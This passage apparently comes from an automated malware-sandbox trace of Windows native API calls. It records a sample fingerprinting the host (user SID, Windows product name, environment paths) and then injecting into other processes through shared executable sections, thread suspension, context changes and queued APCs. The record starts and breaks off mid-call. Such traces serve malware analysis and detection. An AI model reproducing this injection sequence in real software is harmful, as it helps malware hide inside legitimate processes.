ReturnLength=0xddc20) returned 0x0 [0137.036] ConvertSidToStringSidW (in: Sid=0xdd428*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0xddc24 | out: StringSid=0xddc24*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0137.037] NtClose (Handle=0xd4) returned 0x0 [0137.047] RtlIntegerToChar (in: Value=0x88c53315, Base=0x10, Length=0x20, String=0x673649d | out: String="88C53315") returned 0x0 [0137.050] NtCreateKey (in: KeyHandle=0xde69c, DesiredAccess=0x20219, ObjectAttributes=0xddc28*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde69c*=0xd4) returned 0x0 [0137.063] NtQueryValueKey (in: KeyHandle=0xd4, ValueName="ProductName", KeyValueInformationClass=0x1, KeyValueInformation=0xde274, Length=0x100, ResultLength=0xde6f0 | out: KeyValueInformation=0xde274*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x1e, NameLength=0x16, Name="ProductName", Data="Windows 10 Pro"), ResultLength=0xde6f0) returned 0x0 [0137.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc58*=0x0, ZeroBits=0x0, RegionSize=0xddc5c*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc58*=0xcd0000, RegionSize=0xddc5c*=0x1f5000) returned 0x0 [0137.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xddc44*=0x0, ZeroBits=0x0, RegionSize=0xddc48*=0x1f4400, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0xddc44*=0x7100000, RegionSize=0xddc48*=0x1f5000) returned 0x0 [0137.064] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xddc48 | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0137.066] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc10 | out: Value="C:\\Program Files (x86)") returned 0x0 [0137.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x12f219, lpParameter=0xdf2e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd8 [0137.733] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1000) returned 0x705c78 [0137.738] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x78c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xe8) returned 0x0 [0137.738] NtQueryInformationProcess (in: ProcessHandle=0xe8, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.738] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xe8, BaseAddress=0xdea5c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea5c*=0x120e0000, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000) returned 0x0 [0137.741] NtClose (Handle=0xe8) returned 0x0 [0137.744] NtDelayExecution (Alertable=0, Interval=0xde6b8*=-50000000) returned 0x0 [0149.214] NtOpenProcess (in: ProcessHandle=0xde668, DesiredAccess=0x438, ObjectAttributes=0xddc18*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc58*(UniqueProcess=0x78c, UniqueThread=0x0) | out: ProcessHandle=0xde668*=0x134) returned 0x0 [0149.220] NtQueryInformationProcess (in: ProcessHandle=0x134, ProcessInformationClass=0x0, ProcessInformation=0xddc68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc68, ReturnLength=0x0) returned 0x0 [0149.234] NtOpenThread (in: ThreadHandle=0xddc10, DesiredAccess=0x1a, ObjectAttributes=0xddc18, ClientId=0xddc48*(UniqueProcess=0x0, UniqueThread=0x790) | out: ThreadHandle=0xddc10*=0x138) returned 0x0 [0149.244] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0149.269] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde160 | out: Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x34, [73]=0x20, [74]=0xed, [75]=0xa8, [76]=0xfd, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x6641a0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcfa98, SegCs=0x0, EFlags=0xcfb10, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xf7, [23]=0xa9, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x70, [29]=0x18, [30]=0x66, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x8d, [39]=0xa9, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xed, [47]=0xa8, [48]=0xfd, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0149.286] NtCreateSection (in: SectionHandle=0xddbf0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddb90, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddbf0*=0x13c) returned 0x0 [0149.289] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0x134, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0xdbfc6, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x8260000, SectionOffset=0x0, ViewSize=0xddb98*=0xdc000) returned 0x0 [0149.297] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbe8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0xdc000, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbe8*=0xed0000, SectionOffset=0x0, ViewSize=0xddb98*=0xdc000) returned 0x0 [0149.359] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0xed0000) returned 0x0 [0149.388] NtClose (Handle=0x13c) returned 0x0 [0149.398] NtSetContextThread (ThreadHandle=0x138, Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x1, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x34, [73]=0x20, [74]=0xed, [75]=0xa8, [76]=0xfd, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x6641a0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcfa98, SegCs=0x0, EFlags=0xcfb10, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x46, [5]=0x2, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xf7, [23]=0xa9, [24]=0xfd, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x70, [29]=0x18, [30]=0x66, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x8d, [39]=0xa9, [40]=0xfd, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0x6d, [46]=0x2b, [47]=0x8, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0149.399] NtQueueApcThread (ThreadHandle=0x138, ApcRoutine=0x82b6dc2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0149.405] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0149.490] NtClose (Handle=0x134) returned 0x0 [0149.490] NtClose (Handle=0x138) returned 0x0 [0149.503] PostThreadMessageW (idThread=0x78c, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0149.508] PostThreadMessageW (idThread=0x78c, Msg=0x8003, wParam=0xde6d6, lParam=0x0) returned 0 [0149.576] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x5d8, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0149.576] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0149.577] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xdea5c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xdea5c*=0x6750000, SectionOffset=0x0, ViewSize=0xdea58*=0x9c4000) returned 0x0 [0149.832] NtClose (Handle=0x138) returned 0x0 [0149.832] NtDelayExecution (Alertable=0, Interval=0xde6b8*=-50000000) returned 0x0 [0154.928] NtOpenProcess (in: ProcessHandle=0xde668, DesiredAccess=0x438, ObjectAttributes=0xddc18*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xddc58*(UniqueProcess=0x5d8, UniqueThread=0x0) | out: ProcessHandle=0xde668*=0x138) returned 0x0 [0154.933] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xddc68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xddc68, ReturnLength=0x0) returned 0x0 [0154.976] NtOpenThread (in: ThreadHandle=0xddc10, DesiredAccess=0x1a, ObjectAttributes=0xddc18, ClientId=0xddc48*(UniqueProcess=0x0, UniqueThread=0x7b4) | out: ThreadHandle=0xddc10*=0x134) returned 0x0 [0154.981] NtSuspendThread (in: ThreadHandle=0x134, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0154.989] NtGetContextThread (in: ThreadHandle=0x134, Context=0xde160 | out: 